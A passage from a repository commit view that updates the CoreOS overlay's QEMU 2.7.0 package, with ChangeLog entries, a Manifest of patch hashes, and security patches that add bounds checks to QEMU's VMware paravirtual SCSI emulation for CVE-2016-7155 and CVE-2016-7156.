-files/qemu-2.5.0-CVE-2016-2197.patch,
-files/qemu-2.5.0-CVE-2016-2392.patch,
-files/qemu-2.5.0-ne2000-reg-check.patch,
-files/qemu-2.5.0-usb-ehci-oob.patch,
-files/qemu-2.5.0-usb-ndis-int-overflow.patch,
-files/qemu-2.6.0-crypto-static.patch, -files/qemu-2.6.0-glib-size_t.patch:
drop obsolete patches
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> qemu-2.7.0.ebuild:
fix installation with USE=python, bug #592908
Package-Manager: portage-2.2.28
05 Sep 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.7.0.ebuild:
amd64 stable wrt bug #592430
Package-Manager: portage-2.2.28
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
05 Sep 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.7.0.ebuild:
x86 stable wrt bug #592430
Package-Manager: portage-2.2.28
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
-files/qemu-2.5.0-CVE-2015-8558.patch,
-files/qemu-2.5.0-CVE-2016-2198.patch,
-files/qemu-2.5.0-rng-stack-corrupt-0.patch,
-files/qemu-2.5.0-rng-stack-corrupt-1.patch,
-files/qemu-2.5.0-rng-stack-corrupt-2.patch,
-files/qemu-2.5.0-rng-stack-corrupt-3.patch,
-files/qemu-2.5.1-CVE-2015-8558.patch,
-files/qemu-2.5.1-CVE-2016-4020.patch,
-files/qemu-2.5.1-stellaris_enet-overflow.patch,
-files/qemu-2.5.1-xfs-linux-headers.patch, -qemu-2.5.1.ebuild:
drop vulnerable 2.5.1, bug #592430, and 19 others
Package-Manager: portage-2.2.28

1536
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog-2015 vendored
View File

File diff suppressed because it is too large Load Diff

33
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/Manifest vendored
View File

@ -3,10 +3,37 @@ AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399
AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154 AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154
AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73 AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73
AUX qemu-2.7.0-CVE-2016-6836.patch 889 SHA256 a94812131e8baa66b81971579ab84b20bf15d544e2698448a5247ac0ddca0b3d SHA512 cf7f327f26aee5b6688eb662ced8aa07775ad9558b4a02db244303f6b7d37be9cd19b18d5725819b4708184105b98830864e0ad3af81373e59e880809036345b WHIRLPOOL df00627ad447162fdcac4b2c965a8cb5c916a7fb66d8c3a4f8f48bb2d869d7805cb3308cd495ff74ebf4840e7bc2d85abf8e666d78b3da9abb4e2bae22697a82 AUX qemu-2.7.0-CVE-2016-6836.patch 889 SHA256 a94812131e8baa66b81971579ab84b20bf15d544e2698448a5247ac0ddca0b3d SHA512 cf7f327f26aee5b6688eb662ced8aa07775ad9558b4a02db244303f6b7d37be9cd19b18d5725819b4708184105b98830864e0ad3af81373e59e880809036345b WHIRLPOOL df00627ad447162fdcac4b2c965a8cb5c916a7fb66d8c3a4f8f48bb2d869d7805cb3308cd495ff74ebf4840e7bc2d85abf8e666d78b3da9abb4e2bae22697a82
AUX qemu-2.7.0-CVE-2016-7155.patch 2745 SHA256 addf638a53bfae8556e463e0b78a151eef0fdf171eb395a98dbdf0332ff74131 SHA512 96e9df733c5227899da7d2ecc346139df9830dd16fc16f1f14666f8be60205a43f434fd79e158c2000926656ffa137809f1cb3c57a04cb375011f816e92e2f4b WHIRLPOOL c04c0dda417a70e4acb289c6b296da93f3eb8e51f7cfad62351b7235512e04714fdc169a87f4cbf1ef82bfc6decc8ebb5b3958f23d001795c9ebcd08369185a3
AUX qemu-2.7.0-CVE-2016-7156.patch 2314 SHA256 7fa0d7f1025a3435b692a6e7ed8fa3be38a918395a8253e8c27f416ff37e041d SHA512 db3009fdf6d85ffd24fd4a2a40b372b0e665274bba1ce01632aef0d583f2830b58f889166a34acd36409944ab3f7e264801bf89a78f55a586b5f43429a1c86dc WHIRLPOOL ce8101b7607612ed7b9c6fbe373f9b5dec07e0ea8af0b4be8e52b4add5dd0ba12c9e5eb7380d68e3d3867988e0cfc1bdd1e8357ce2b71ef19f51e316fac62161
AUX qemu-2.7.0-CVE-2016-7157-1.patch 888 SHA256 7a1f6199b16c220df51002e1222763d1a7c7b3a08349f664e576a9facc553516 SHA512 5c104464dfa48804d94ccca9a9d881f9e22eba2c3d9a2cbf3a645c3a696e89ea3f4603ea28deba9a1cd800df9bc5ad4894606869eca3e1e9cf95414723846938 WHIRLPOOL af42ec7ca93c92c4df060b4efd61bcc3f7cb5582d00bfe174d81f2393ad3a7f06e27cc2b2186f664860c3ee98f76dd68cd7e6de7ff7e63b778f345c32a62b495
AUX qemu-2.7.0-CVE-2016-7157-2.patch 812 SHA256 1db3b565b4762abbc1096286c9887400591af76bf422a105e457c6bdcb887b59 SHA512 8d2177adc638d384302ec89de65a0acd4f4069580c40d6c50cb78501f25f4d171f3b92a36464711337e07dbf208f9ad93eb2f86a7361dde52026c1764341e10d WHIRLPOOL e815e165bb23cd42aaba2310e3fa48bba33b0344069e6f54c4b26dddad746516053221969fad855d6c827d42371494c609123b002e1e2a96c366d11131b3243a
AUX qemu-2.7.0-CVE-2016-7170.patch 1527 SHA256 37d600b5a4ba143f1d6b26acbcf23357fa41a5f852774f68b6b6736a6ecec024 SHA512 c84494ec4ee9607cef7b230a25d10de444a29fecba57566df5394d40b88596ef91fbd5edfb51a58c5ecff7fa7ef39b7d32ba7976dbd011fb1b29a2e46e4e0080 WHIRLPOOL ddd3d94da447556b24257c11068bef360da6cf35e22257869b09057f42ba027636e605db96d9a66253f423f5667814a1f8c551f8eece733fd997b03d6ac81e2b
AUX qemu-2.7.0-CVE-2016-7421.patch 1183 SHA256 f3996d9d4658fb32a04ce8ae3d3510e6a51a0aa39f64b003a636f68dacef19db SHA512 51d07015e27e4dfbde2c3ffa37d91134374b49c136735845c34155238767483ede8bbc7232ea93b4e4cbcc28195cbe1986d44ac0dd96e914ec29df3a1da9dfcc WHIRLPOOL a4e27d329591b2a3b94a7abed81df1f87509f5a38beb490d7a4ca7c14df2a864f4126c26fc044bb4357467b0f9ed0ca5811d5e85812e318adcb3236c30bef7a1
AUX qemu-2.7.0-CVE-2016-7422.patch 1125 SHA256 7a3d31031b8ea70be29715e8d384f47ad8758e81b9cfc3768e59dd6c6a00cb2a SHA512 6a08f661cd2b00214297570c8035042544b0e707b2f20f6c59c251a73971f2b7e1920c7242ca09a4684ea58dcb177d11d087ee5e0523792e3c446e70239498ef WHIRLPOOL 82b38aa12e49695c1f0c67c303039afb05cc314d14e5bc8286bafebfbabd3eb3cddd41338d45f9510ea2f5074fd9028b39c251be0e5856e0221232a8b28797a9
AUX qemu-2.7.0-CVE-2016-7423.patch 925 SHA256 2b9b1102c3c9c54ba2c311661c3222b1df246a519e9eef57d0793951c1249ae0 SHA512 e4401163d15f9ebd9057b8ddf4187f7a0a2f379cb8aea2bd92b20f132f7714a4e386733884be4568eddbd4067b6cad80275ccc101276897c4796117a9b20144f WHIRLPOOL 9bd9f5ed067604f065d3ac7447f8135dd72e178caa6f3c5a5ca7bc531a8008ec46620c4af33bea54a35dfe52e430d48dcf5b59145c4e1efc2a14cb789e38f5bd
AUX qemu-2.7.0-CVE-2016-7466.patch 830 SHA256 5664c091038185766a54b93495029bbf6de116e8752c2334fa1c71b8387e89c3 SHA512 d158b1f66766f33b1df561956cc3c77d40e1422e44791cfc753d3def2f1851c2c9c0aeb299bcd1ae969dde8f4249f4489ed90776ebb497db4f626217710e4f48 WHIRLPOOL 13112769ecd6420e17d2a3c0e110a2bd479fc09d8a2086d27f0703a4d6c35ded07e003f28ff14579655c5468cd02c77fa514ba7ed6543f61deb60c6de604c99b
AUX qemu-2.7.0-CVE-2016-7907.patch 1380 SHA256 58aa0af82a88de8967452c06ec229de381494e7ac222273ac5a7aa2c53dc5529 SHA512 5a311dea9554d7225d75fb2c680d2f7a2b151b46802176424f495e792ab4a9a101ad99099ccf2b6250230f23fc1ea804381129cd34eb0e4cd24c1e2442de9b51 WHIRLPOOL 69e7e01bc0b221581a8b1ef1af23eb59a6ad87acbfe821ccf8c23f349c9e31b84e4b8db83f48a849a4c5e9b6229f8d55e671da9f8485ecbc24855a8ab50b02ec
AUX qemu-2.7.0-CVE-2016-7908.patch 1718 SHA256 3042b5425964c9bdb6ebc17d8f4bc5efd150547a348269d54e0962efc6a658d4 SHA512 441aa4fe46a2d6d425b1759ebadabc12fb1902f80364d351120932a13b9a46030bd2ad8c7faa57d6bcfbf740d9af2a96cec082a0d40b9a7469499ba1f19177bd WHIRLPOOL 6d870c28645e6fcb12e55a4da5f9dffae78d1fcd013ae6fd9727ae46e05103dc8870d548117e7f396af79cf76947ee8d0b5285ec9b4c6aac840aa6d1e1fc9054
AUX qemu-2.7.0-CVE-2016-7909.patch 975 SHA256 8fb9a27f56c6875f271ac0dc80fd78af8b70d40778ef967019e4a1b0a47ff1ae SHA512 e2793eb18179a7c7276c4d437ea68bb02a6a3963842dd74041fdf3c9f239d6353c7d9e5705c1342fc01b5c7e3bc1bfb882d8094fbe4144ac5f705852579139ca WHIRLPOOL b73aef899c94c9130385dd757b25783b20fce9d32faa245847353766e046bd769789d8b107ef06c726a0e2471a5ef1599716343782c8a82267b79ca53c281414
AUX qemu-2.7.0-CVE-2016-7994-1.patch 835 SHA256 6b84d2273197bd441761469245991d02b5de8b70c29abf096df301e87b5c2478 SHA512 7a8c1c6ffc654f428485057a31d40a831707e5e6a84e32f722f6fc4c86ed474dcd19bfc8034b3a603362d821e7170f46e25ddc2ca50b60f00f45455241ba9464 WHIRLPOOL 80c5c51535cec848664811d8cf41db9d931e3215522fcaa404fa55f0c3b821bac346129b254b60a72cc09493366d8499882874dcb797e8a81e39157f64539b73
AUX qemu-2.7.0-CVE-2016-7994-2.patch 896 SHA256 c23fdfb127f60d24c4b56e7745463f5655ace7af9f5fa392544e7ce05a564c5d SHA512 4243d04a573ccee043911645e716a9c6f7e28858163b48ea58e7a9734d817ac9237c4866fce843dbe10fa996cdd5453f3b704509ff4761f2ec4531d9355cc7ce WHIRLPOOL c5f7b605f566f94ad170c4819c378f9a1e3ae2740130000d9bea4c741f29365a1b5a1f1d495646e866c39a18d7da1236d731861005099457e09bead9fffa8105
AUX qemu-2.7.0-CVE-2016-8576.patch 2092 SHA256 dbe3ee6778cdd802fbd7d7cb2aa991cc73e6be160bad90f2e40de02ab820a865 SHA512 25daaa79f4cb355c5dce639a14c2e265142a0c83bdbc813816789f37e293846f3768f08b9f04f692ce5b8719dadd2dbedb75f314a3f441a70e0789ecc88eb8de WHIRLPOOL 25fc67d9dc8e8d8345778b46b16f9f7c5d6da39ebefea60ef81b20e4685014a019d4c39a6619dbf48411800ae9e9c383a7243fb055ea1f2bd0b2cb7e1a2c8d4e
AUX qemu-2.7.0-CVE-2016-8577.patch 1020 SHA256 fbe7b6183f019ed6c8c6afeeed4854c23991d3f18501e8f3403df8812cefd420 SHA512 364434deb120856a114a94aaab2edbaf9e5f9246e6393f584949a6b706dbdc5b711f459a48e3825554e2fa9595a1aa78fee3711cfeba3b94219b4f47e269b2de WHIRLPOOL 561f7bd41f0ac439808070757cdff9f69f6a378fe6610269c32d600575ed60b22919f4d3ea08f621648dbf3e5e97290737005e9df5949bdeeba9319901cf427e
AUX qemu-2.7.0-CVE-2016-8578.patch 2208 SHA256 9b0e7852aefeb3950de38babec7a30f3225342670a72160829baa5e50786bdef SHA512 326ec2112b1cbaa4b4ddcacc02f4accd5b73e78db07e93b229d891f4cbc8d5a2db82c727d920613abd1668402ffeb16a223d8271db569435966aaece271da875 WHIRLPOOL 88ca80aa1883813f1ec9c0802e830f719317130de6959df393188e4e82764125868baec038a1dac94eab33851706838d245b205edcbf8e1864ceb83257648b99
AUX qemu-2.7.0-CVE-2016-8668.patch 1124 SHA256 26f16376a73bdf9052039d1bd90545b75cc8fb0a89e0bffbf5881b537319b759 SHA512 de4df82297d199cadafefd57bc895cdf21c5acb0e0a6223212272991b652c302475d8662fb013d6a3e949d2e57a14a0ac6d861f486de8b5130fd84d66957c899 WHIRLPOOL 3995164f25accfd5c837c85fbb590acd0b7effb08370a7d4c0cb03c042ee03b2b10ca9892bd50251d17a1ba2ffff1e7a04e918f4d4e1c85406df95a6802c03c2
AUX qemu-2.7.0-CVE-2016-8669-1.patch 911 SHA256 ad841a34490a02123df31aef5a0b9d31912eec8465e0c5da7cf73dc880ffd8f4 SHA512 23a26716ea554d9af73afb08d3a3d1e668e23bc0710508196039454dfccbe3764feda63d901a9c053c52af92cd069f5a4f078efdc9924f6d3cfe6a21f9d287de WHIRLPOOL 412d7a4be19defa4a098fad6a66cadd7eca9cb5971828636dfd20a57b3eef09f3801660dbf507ac1ef0fa82f9f01583e9c5e2b1e45c016adb535cd951ff16eff
AUX qemu-2.7.0-CVE-2016-8669-2.patch 1037 SHA256 176a35f5191023ad665cb4019663618d48948b174b16888776245d1a001ec186 SHA512 82a71c9566f37aceffbbaa45547bc686c028353a1845bd63e49550e71201921bc2fb9793077fc1fc74d77417da84dae71e0862243acbb3d900db258a343b8ede WHIRLPOOL f489c52bf2ca6e434695a5ca12af64a83e6534536c07b02c54f82c72e59e3f026e6a9fd9cec5eb62e2cf8d009f878ac1015f58d9f5ba725a03e1e194c4abc96c
AUX qemu-2.7.0-CVE-2016-8909.patch 980 SHA256 989210bfac97091e67fbe973be7a6d8aa0e6411069904a07f7c57c67e8539bb8 SHA512 23a1cfa4f257e598152d92e11d94e88c52b3702aa585fba3a71340ee16dfbd29234d6e5c81613ea71b64cead8dcdbb536246096b1c374290aa39871daacb25af WHIRLPOOL 9909ed14f5fa4a1d2ea0f8bb13f5a0e08e2f7888078e1f5b4cfaf381ccabeac22c998c9785efee6a307dbeed45801d8354650c18c6920bfb13da030127d9da7e
AUX qemu-2.7.0-CVE-2016-8910.patch 848 SHA256 919e566e98434486f89ecfc3158ccee59c5bbdf3848b2a668136901871f5f1ab SHA512 1f695ebc2f10b2cda5a9b93c097adb49858af94817c14a406c7d26edd42353c776b0afc4779bc1c6f930dadcf450906924f8080ca5c87eb7c7e6b5694464dc7e WHIRLPOOL 574900ab3eca13429769c7e2b56fd4e4b1220800b2e5bc933eef502c633614eab22cba6af4fdd1fd55e3a7e70d3d5ead1cb1970f8211b5f4fc43e3d782865f1b
AUX qemu-2.7.0-CVE-2016-9102.patch 739 SHA256 ae425fbbaf6dedcf6eabe3d1f0bd300be70550f7bd77290536617372eed96766 SHA512 dbf40c7f0a055d10fbb5d02b21e8c3f62dc9bb2718639eb3dec007ba610aa0a045c1a449a7b3aa02a21056807a25d6e523eb782d79b2a249df1258af1dadefad WHIRLPOOL 89ea3815b9d744a98ff49df65a514a20966c7ada508e33dbc73704d60c75c48f6f544bf658180a2b73ca612bcc62e2e146b0efdbbc51456ba81518c5b28c80dc
AUX qemu-2.7.0-CVE-2016-9103.patch 1002 SHA256 009696b3403c0481223fac6bc93976fc85727eeb0716a9e19545e8ac4da95e8d SHA512 0f47c2d13cbda36a7796773150865001060e4b530d76ca6b0c46d1041108a57830939b0dc7cdc960ccc705bcd463dd57505d748edf36610d7de2af2560e62597 WHIRLPOOL 8d4cb500025f59075a1038cefe0c8ccd063282527b35873cdd9d29ba58cdaa3fc285d5191657ecdef2b056a017f89d8f66f4a544f201e5952426d6dd619b23ba
AUX qemu-2.7.0-CVE-2016-9104.patch 2890 SHA256 7ba38b43519eb8f9c8c70daaa1705c01a331cbb98b4d4f8eeed31da207f3a13b SHA512 7f6d84f12e8372b72fe4db8e47064ecc7ea0698bb7c5dc0285316354461edb35e01ba76a6e16c1bf7e03d5f0070822f4bb61655e44af5536ee81970b4ff937e0 WHIRLPOOL 3f8e973cf28040422d25394b14f3b99894796b64408a3c15957d628d74076bc1e577ea2e2803e428d85b94607c74f81d23219d9487aa0085a80a2e89d78a5829
AUX qemu-2.7.0-CVE-2016-9105.patch 610 SHA256 f4303796ece1e46f6e622e8cd0c9029daa0a6ed29ef630a0c64a5c595dbeb1b3 SHA512 1ab19ef861b6fe55017d02b7cbf24ad60776ed64e052d6e1b670c9aac7e312207718fcf601e9dba4bdd2c9104b9be25bcf0055b42e080b1f8abf9bc3f7db0b36 WHIRLPOOL 07fe76de2d2d68bcd091e90cc9578b17d5a8ad12ab316683d6e4badea443d08e08060a4e206f555c88b60b0a45f4ba49c9d11f42ee44b5b43200843c37329dad
AUX qemu-2.7.0-CVE-2016-9106.patch 835 SHA256 594213b4200ae109dfbc6ec8e536d275d798c756a25e130a86972c514730f541 SHA512 6a3249f47fecdbe28eec496eb1284296d04d9e75efab21ab226d6ef2d5254bd85a44aa08879b1922682b65b5bce2e699ccaafa3a2b8b6f60ccbc84432bc599cd WHIRLPOOL b80c2787cbe71f416a7ea2aa39e800922b0a8a410eacb038d0163dfbb91f6a41cc2ae5afb010a7395ef17207e6b1acda34cddd9ff9d1ab035330ade6334e8b8c
AUX qemu-binfmt.initd-r1 7966 SHA256 5b4b432aa1e44f387c9eb789de0ec6322741fd36dd241f76520f17c6cd6ac49b SHA512 2ba0bff6eb2b6bac4ed440f793771ce9551cad48e38bddb6cf04f804faac2407e80879f66771910344ddcea45f0014095dcc8bfeb0aad5085ef048fd3612dbd8 WHIRLPOOL a2a1fb830a970757d1e203378c7d382b161b1040f3b8aaf0f22bb3b5e46467eff395474ff40d93c9f133bab307b345a6f75d63eae9f8dd8daf67324db41032f9 AUX qemu-binfmt.initd-r1 7966 SHA256 5b4b432aa1e44f387c9eb789de0ec6322741fd36dd241f76520f17c6cd6ac49b SHA512 2ba0bff6eb2b6bac4ed440f793771ce9551cad48e38bddb6cf04f804faac2407e80879f66771910344ddcea45f0014095dcc8bfeb0aad5085ef048fd3612dbd8 WHIRLPOOL a2a1fb830a970757d1e203378c7d382b161b1040f3b8aaf0f22bb3b5e46467eff395474ff40d93c9f133bab307b345a6f75d63eae9f8dd8daf67324db41032f9
DIST qemu-2.7.0.tar.bz2 26867760 SHA256 326e739506ba690daf69fc17bd3913a6c313d9928d743bd8eddb82f403f81e53 SHA512 654acaa7b3724a288e5d7e2a26ab780d9c9ed9f647fba00a906cbaffbe9d58fd666f2d962514aa2c5b391b4c53811ac3170d2eb51727f090bd19dfe45ca9a9db WHIRLPOOL dcb3e5f7da89dd8e14d636d7ebd476e076e0043880bb9ea3fb1c03cb4bcd4e5c7d3c4719da26c3ce521e3a3db5ae671e86f198ac1bc3474e774d75504fef8b8d DIST qemu-2.7.0.tar.bz2 26867760 SHA256 326e739506ba690daf69fc17bd3913a6c313d9928d743bd8eddb82f403f81e53 SHA512 654acaa7b3724a288e5d7e2a26ab780d9c9ed9f647fba00a906cbaffbe9d58fd666f2d962514aa2c5b391b4c53811ac3170d2eb51727f090bd19dfe45ca9a9db WHIRLPOOL dcb3e5f7da89dd8e14d636d7ebd476e076e0043880bb9ea3fb1c03cb4bcd4e5c7d3c4719da26c3ce521e3a3db5ae671e86f198ac1bc3474e774d75504fef8b8d
EBUILD qemu-2.7.0.ebuild 20516 SHA256 987648bd2fd0f1ebf45493698ec2b9ed2e16d6abb38fd48eb793ef3b6d55c55b SHA512 bf0cd8fa256036002771d3e5476970d50ffc6b86c8b6a9b5a0048c4ac992b816fb5585d2fd1485b3adda3a55737b32e8e1f07bcea4200d3bac0a9ac98840e181 WHIRLPOOL 3f9b559d60a933339a52de83004632bdfc8c45285013cef86a5f99fe580eafa7443ea5cae9399b54865bb05bc1007492575f98ac109b2a17d37d10d44d8874bf EBUILD qemu-2.7.0-r7.ebuild 22214 SHA256 a7f8b5889bfc48862dc7bf1868c3edaf71c1dc234dc8a42b95cb5b223b028151 SHA512 4314c6d3fc6c627e0cb2795f764f739eb353e9cbad709bf2be352d1c0022842cab18bed315169dc7fb6b95018087b173b930074345c5113bd7a012cda66f10cc WHIRLPOOL 14616e86ea4b102c30af58d3ecb5834586c051a1a58778e6cb5fc08f79d9b5fbde2579d6e49e7a464d4906b4e3019b518f405b21c4b413de0cff83ab5050be43
EBUILD qemu-9999.ebuild 20465 SHA256 0722782a27bbb312bc9bede6a556fd6f086e6c056cb4b8b197e3ec8c10801945 SHA512 3f5130a9cffb1cdf7460693e777c82ec289649ba74367417f1a865f7231a976de234b2be5c2882eeb358d1aecb2e59f3ddf8bd28a66be17bea4ef58b122564ae WHIRLPOOL a009c51c5f08c6e9ee89467b47eef435fd68b97c3e253a300662cf476f119ad4c96911040a72570d1f2aef3d44128b0c5544008918764430e0f9f0dde94b16ad EBUILD qemu-9999.ebuild 20472 SHA256 5802d28fbfc1d398a154b4ef3d62e74bfe5166401d2b56c0c62f481a8bec4ef3 SHA512 96a34de1ce3fe58a16add1549e2c6233f8ffcc63f2b38dcfca9d941d147e3f9ff10dc0bfc9e4c92fbe3a108b23f59171d6cd311e5d99229f020198d0493a4b38 WHIRLPOOL cc4bdd1a001ab106e6ffb39612c7cabdca9faf8e7aceb07942c0f0440cf71cdb8bf96c23d71773d6e5d3e11234c1811c22f22f613fff5781c072e955a0a32f29
MISC ChangeLog 28480 SHA256 20cb806ded220afccc77c70ce040291665a4325b627cdc0f975f66919006aedb SHA512 93aa1616116d1d5e0456e14c86773373a65febd9128e72400ffeb7db5ee4721ceba0dc53607d86435049cbd910846b4197f2b15b00f39de601efaa6c90d8b9f3 WHIRLPOOL a54f9b7c1260a190174240edae87e47b7b9f39a51e8f1d03917748b2ea82e2e0721fb142cc7b33ce54e285deb8e4ba3fc483ab0c912f4ae28d3280777d9588f3 MISC ChangeLog 34977 SHA256 48c9a111a9eac22d5aef983a5c98fd2ce37cbb2df943a32638287d3a7477c6da SHA512 4a97d97960ad4accde6b48764a380160484427db586ded5d1699327a89e412760d9e7ed81a185f6900afed171f0023dd4c34dfc2148d98ff222e0c24c2af1649 WHIRLPOOL 75bd0f8453a37ad223f11f28971f195a54e003e973b6e44aa48f4b9b2532bb3dd39f35655c239d7b3b7a6fc0c4ff719ae5abab652b92da6664cd8bee523ef047
MISC ChangeLog-2015 58193 SHA256 60c1a4f4c85515520ab14da920bbbf4a6813491ce16b5357a0456ea588815a5c SHA512 ddfe8e75aabe59b731a4a8b31839d8c71fd516620306d2bc99d7641cc501652974e053104caafa7550c5ad33b6834295f6743a98b9419d292b8bf6f67918ccd3 WHIRLPOOL a6841f79c3ba1cbf76a8c7fde296a2912c46ddd251494dca3bf3bc13391c80595b6f80125c383823899942248008ede7065b0f5c8e43f9bc1d0464aa62cc187f MISC ChangeLog-2015 58193 SHA256 60c1a4f4c85515520ab14da920bbbf4a6813491ce16b5357a0456ea588815a5c SHA512 ddfe8e75aabe59b731a4a8b31839d8c71fd516620306d2bc99d7641cc501652974e053104caafa7550c5ad33b6834295f6743a98b9419d292b8bf6f67918ccd3 WHIRLPOOL a6841f79c3ba1cbf76a8c7fde296a2912c46ddd251494dca3bf3bc13391c80595b6f80125c383823899942248008ede7065b0f5c8e43f9bc1d0464aa62cc187f
MISC metadata.xml 3925 SHA256 d1c219b7da0cbf77919cd1e055acbb3f6788a574fd802c98a43c89a411697b36 SHA512 3ff45d1c8ede12b4eedc7d01f39777b76a1cbd0ba9364299dec99d4b4a05cade5784d6f6e50197d5b5ae1f1b8e831c49da195eb53263c49b7d16aec8ee28b6e6 WHIRLPOOL bc25783fac0f3f13318834cc535404af9af20de16c7aeec222e59dc2ed7740ac5e767b329a5bcd6356d0cbae2428e278515f1446aa8ecb87a873bf4dbe04bf41 MISC metadata.xml 3925 SHA256 d1c219b7da0cbf77919cd1e055acbb3f6788a574fd802c98a43c89a411697b36 SHA512 3ff45d1c8ede12b4eedc7d01f39777b76a1cbd0ba9364299dec99d4b4a05cade5784d6f6e50197d5b5ae1f1b8e831c49da195eb53263c49b7d16aec8ee28b6e6 WHIRLPOOL bc25783fac0f3f13318834cc535404af9af20de16c7aeec222e59dc2ed7740ac5e767b329a5bcd6356d0cbae2428e278515f1446aa8ecb87a873bf4dbe04bf41

81
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7155.patch vendored Normal file
View File

@ -0,0 +1,81 @@
From: Prasad J Pandit <address@hidden>
Vmware Paravirtual SCSI emulation uses command descriptors to
process SCSI commands. These descriptors come with their ring
buffers. A guest could set the page count for these rings to
an arbitrary value, leading to infinite loop or OOB access.
Add check to avoid it.
Reported-by: Tom Victor <address@hidden>
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 21 ++++++++++-----------
1 file changed, 10 insertions(+), 11 deletions(-)
Update per review
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg00019.html
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index 5116f4a..4245c15 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -152,7 +152,7 @@ pvscsi_log2(uint32_t input)
return log;
}
-static int
+static void
pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
{
int i;
@@ -160,10 +160,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
uint32_t req_ring_size, cmp_ring_size;
m->rs_pa = ri->ringsStatePPN << VMW_PAGE_SHIFT;
- if ((ri->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES)
- || (ri->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES)) {
- return -1;
- }
req_ring_size = ri->reqRingNumPages * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE;
cmp_ring_size = ri->cmpRingNumPages * PVSCSI_MAX_NUM_CMP_ENTRIES_PER_PAGE;
txr_len_log2 = pvscsi_log2(req_ring_size - 1);
@@ -195,8 +191,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
/* Flush ring state page changes */
smp_wmb();
-
- return 0;
}
static int
@@ -746,7 +740,7 @@ pvscsi_dbg_dump_tx_rings_config(PVSCSICmdDescSetupRings *rc)
trace_pvscsi_tx_rings_num_pages("Confirm Ring", rc->cmpRingNumPages);
for (i = 0; i < rc->cmpRingNumPages; i++) {
- trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->reqRingPPNs[i]);
+ trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->cmpRingPPNs[i]);
}
}
@@ -779,10 +773,15 @@ pvscsi_on_cmd_setup_rings(PVSCSIState *s)
trace_pvscsi_on_cmd_arrived("PVSCSI_CMD_SETUP_RINGS");
+ if (!rc->reqRingNumPages
+ || rc->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES
+ || !rc->cmpRingNumPages
+ || rc->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES) {
+ return PVSCSI_COMMAND_PROCESSING_FAILED;
+ }
+
pvscsi_dbg_dump_tx_rings_config(rc);
- if (pvscsi_ring_init_data(&s->rings, rc) < 0) {
- return PVSCSI_COMMAND_PROCESSING_FAILED;
- }
+ pvscsi_ring_init_data(&s->rings, rc);
s->rings_info_valid = TRUE;
return PVSCSI_COMMAND_PROCESSING_SUCCEEDED;
--
2.5.5

62
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7156.patch vendored Normal file
View File

@ -0,0 +1,62 @@
From: Prasad J Pandit <address@hidden>
In PVSCSI paravirtual SCSI bus, pvscsi_convert_sglist can take a very
long time or go into an infinite loop due to two different bugs:
1) the request descriptor data length is defined to be 64 bit. While
building SG list from a request descriptor, it gets truncated to 32bit
